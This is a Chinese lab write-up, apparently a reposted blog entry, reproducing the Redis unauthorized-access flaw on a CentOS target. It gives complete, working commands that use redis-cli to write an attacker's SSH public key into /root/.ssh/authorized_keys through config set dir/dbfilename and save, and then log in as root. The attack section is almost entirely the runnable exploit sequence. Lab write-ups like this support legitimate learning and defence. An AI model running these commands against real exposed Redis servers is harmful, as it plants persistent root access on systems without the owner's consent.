1. redis未授权漏洞复现(写入公钥利用)


 先复现一篇公钥写入的利用方式,以便明天使用,后续补上其他利用方式。

一、环境准备

  1.靶机环境 CenOS 7 64 redis-2.8.12   192.168.0.111

  2.攻击机   kail  64 redis-2.8.12     

 

  环境安装有几个坑:

  1.靶机安装redis默认服务端不启动,需要手动开启

  附链接:https://www.cnblogs.com/williamjie/p/9370196.html  

    进入bin目录:redis-server /redis-2.8.12/MyConfig/redis.conf  //我自己的目录启动方式

  2.kail攻击机默认不开ssh,没有.ssh目录,需要手动操作

  附链接:https://blog.csdn.net/weixin_41708020/article/details/106731997

    根据以上链接操作,最后执行:ssh localhost  即可生成 .ssh 目录

  

 

 二、写入公钥

  1.  ssh-keygen -t rsa  //执行生成key命令

  

   2.  (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt  //将公钥写入txt

   

    这里最好开两个命令窗,一个在ssh下,一个在redis/src下

  3.  cat /root/.ssh/1.txt | ./redis-cli -h 192.168.0.111 -x set xxx  //将.ssh目录下的公钥文件1.txt 通过redis-cli客户端写入到目标主机缓冲中

   

 

   4.  ./redis-cli -h 192.168.0.111    //使用客户端登录目标

     config set dir /root/.ssh      //设置存储公钥路径

     config set dbfilename authorized_keys  //设置文件名称

   

 

   5.   get xxx      //查看缓存

      save     //保存缓存到目标主机路径及文件下

      exit    //退出

  

 

   6. ssh 192.168.0.111  //成功登录

  

 

 参考连接:

https://blog.csdn.net/Jiajiajiang_/article/details/81368212?from=groupmessage

https://mp.weixin.qq.com/s/Vj24aRbr3P7Pg59HE3SpRQ

      

 

  

 

 

      


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM